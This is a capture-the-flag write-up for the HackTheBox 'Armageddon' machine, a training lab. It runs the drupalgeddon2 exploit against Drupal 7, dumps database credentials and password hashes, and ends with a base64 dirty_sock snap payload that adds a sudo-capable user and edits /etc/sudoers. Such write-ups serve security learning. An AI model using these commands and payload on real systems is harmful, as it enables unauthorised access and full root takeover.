Armageddon – HackTheBox Machine | Writeup

Info

Armageddon is Linux-based easy machine, created by bertolis.

Enumeration

Let’s run network scan to check open ports and service versions.

SSH and HTTP port are open. We should be able to visit page on 10.10.10.233.

And yes, there is login page. Let’s explore this. On this page we can’t find anything interesting, but in source page and Wappalyzer…

Exploitation

It was easy to discover it. Drupal 7.x has multiple vulnerabilities, including PHP object injection and remote code execution vulnerabilities. Let’s google it.

This exploit name is actually very similar to Armageddon. Too easy if it’s correct one. Let’s git clone it and run it. It has very good explain how to use it, check it on GitHub here.

Before running, make sure you have installed highline gem .

sudo gem install highline

And then run exploit.

./drupalgeddon2.rb http://10.10.10.233/

And we got it. But there is not user.txt. It means we need more to explore.

User Escalation

Since we can’t use cd command, we need to manually explore it (ls /some/path or cat /some/path/file.txt).

Interesting directory is sites, where we maybe can find credentials.

And, we found it. Let’s connect to MySQL with these credentials. We can’t connect from our local machine, so, let’s login from shell we got. Since we can’t get actually MySQL shell, we will use Single MySQL Commands.

mysql -u [Username] -p[Password] -e "[Command to execute..]"

mysql -u drupaluser [email protected]*m23gBVj -e 'show databases'

And we can see drupal database, let’s check tables.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'show tables'

And, users is there! Let’s check it.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'SELECT * FROM users'

There is password hashes and usernames. First one, brucetherealadmin, has email added, [email protected] and that email is different from the other ones, so he might be main user. We will try to crack these hashes with john.

I already did this machine, so I’ll just show the password john cracked earlier. Command for cracking is in image. Now, when we have credentials, let’s login. brucetherealadmin:booboo

Got user! Now, let’s own root.

Root Escalation

First, we’ll check sudo capabilities.

We can run snap install without using password! Great, we can find exploit to escalate privileges with snap. Let’s google it.

We will check first one, named dirty_sock on GitHub. Clone it to your local machine.

I tried to transfer both scripts on target machine, but it not worked. We need to install it on target machine manually. I was looking at scripts and found this in dirty_sockv2.py:

So, we’ll copy this and print on target machine to .snap installation file, and we can install it on target system. We will use this command on target machine to make installation snap file:

python3 -c 'print("aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "==")' | base64 -d > installation.snap

And then,

sudo /usr/bin/snap install --devmode installation.snap

–devmode allows users to install snaps without enforcing security policies.

We will read README.md now to see how to use it.

Okay, so we need to become dirty_sock user. Let’s do this.

Yay! We are dirty_sock! If you get error that user doesn’t exist, just reset the machine. I had same problem. Now, we will try to become root. Just type sudo su.

Wooah, we got root! If it asks you for password, use dirty_sock as a password.

PWNED!

Thank you for reading this writeup. If you want to support my work: